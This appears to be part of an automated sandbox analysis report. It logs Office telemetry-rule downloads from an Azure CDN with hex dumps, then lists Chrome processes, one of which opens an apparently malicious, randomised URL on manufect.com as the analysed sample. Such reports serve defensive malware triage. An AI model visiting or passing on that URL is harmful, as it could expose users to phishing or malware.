                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044826Z-16849878b78z5q7jpbgf6e9mcw00000005u0000000009k53
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:26 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                  Session IDSource IPSource PortDestination IPDestination Port
                  142192.168.2.44989013.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:26 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:26 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:26 GMT
                  Content-Type: text/xml
                  Content-Length: 1414
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                  ETag: "0x8DC582BE03B051D"
                  x-ms-request-id: 10ca92f3-d01e-008e-1b31-22387a000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044826Z-16849878b788tnsxzb2smucwdc00000005t0000000005v9c
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:26 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                  Session IDSource IPSource PortDestination IPDestination Port
                  143192.168.2.44989113.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:27 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:27 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:27 GMT
                  Content-Type: text/xml
                  Content-Length: 1377
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                  ETag: "0x8DC582BEAFF0125"
                  x-ms-request-id: aba5bc6a-e01e-0003-59e5-210fa8000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044827Z-16849878b78dkr6tqerbnpg1zc00000005q000000000g9ua
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:27 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  144192.168.2.44989213.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:27 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:27 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:27 GMT
                  Content-Type: text/xml
                  Content-Length: 1399
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                  ETag: "0x8DC582BE0A2434F"
                  x-ms-request-id: 4e2d5377-a01e-000d-2ff2-24d1ea000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044827Z-r197bdfb6b4gdlhqw6kbe0ekvs00000008t00000000075sq
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:27 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                  Session IDSource IPSource PortDestination IPDestination Port
                  145192.168.2.44989313.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:27 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:27 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:27 GMT
                  Content-Type: text/xml
                  Content-Length: 1362
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                  ETag: "0x8DC582BE54CA33F"
                  x-ms-request-id: 2282242b-b01e-0084-2155-22d736000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044827Z-16849878b785f8wh85a0w3ennn00000005hg00000000sa54
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:27 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                  Session IDSource IPSource PortDestination IPDestination Port
                  146192.168.2.44989413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:27 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:27 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:27 GMT
                  Content-Type: text/xml
                  Content-Length: 1409
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                  ETag: "0x8DC582BDFC438CF"
                  x-ms-request-id: 083398c4-801e-0067-51f5-24fe30000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044827Z-15b8d89586fxdh48qknu9dqk2g00000000wg00000000knw6
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:27 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                  Session IDSource IPSource PortDestination IPDestination Port
                  147192.168.2.44989513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:27 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:27 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:27 GMT
                  Content-Type: text/xml
                  Content-Length: 1372
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                  ETag: "0x8DC582BE6669CA7"
                  x-ms-request-id: f0353451-e01e-0071-7340-2208e7000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044827Z-16849878b78p4hmjy4vha5ddqw00000005n0000000008cah
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:27 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                  Session IDSource IPSource PortDestination IPDestination Port
                  148192.168.2.44989613.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:28 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:28 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:28 GMT
                  Content-Type: text/xml
                  Content-Length: 1408
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                  ETag: "0x8DC582BE1038EF2"
                  x-ms-request-id: 0ee1a661-001e-000b-6e0b-2215a7000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044828Z-16849878b785g992cz2s9gk35c00000005r000000000csd0
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:28 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                  Session IDSource IPSource PortDestination IPDestination Port
                  149192.168.2.44989713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:28 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:28 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:28 GMT
                  Content-Type: text/xml
                  Content-Length: 1371
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                  ETag: "0x8DC582BED3D048D"
                  x-ms-request-id: 94b404e1-401e-0047-3e0b-228597000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044828Z-16849878b78p6ttkmyustyrk8s00000005k000000000gaa6
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:28 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                  Click to jump to process

                  Click to jump to process

                  Click to jump to process

                  Target ID:0
                  Start time:00:46:58
                  Start date:23/10/2024
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                  Imagebase:0x7ff76e190000
                  File size:3'242'272 bytes
                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:false

                  Target ID:2
                  Start time:00:47:02
                  Start date:23/10/2024
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2624 --field-trial-handle=2020,i,9436422360427185457,16463863993275547798,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Imagebase:0x7ff76e190000
                  File size:3'242'272 bytes
                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:false

                  Target ID:3
                  Start time:00:47:04
                  Start date:23/10/2024
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t3sp2vzrhieujyp67175b9328f1f.manufect.com/d4761486d567859506150/hdQrcEwPXaK/6a6362784e6e4e4b4561&_webpack"
                  Imagebase:0x7ff76e190000
                  File size:3'242'272 bytes
                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  No disassembly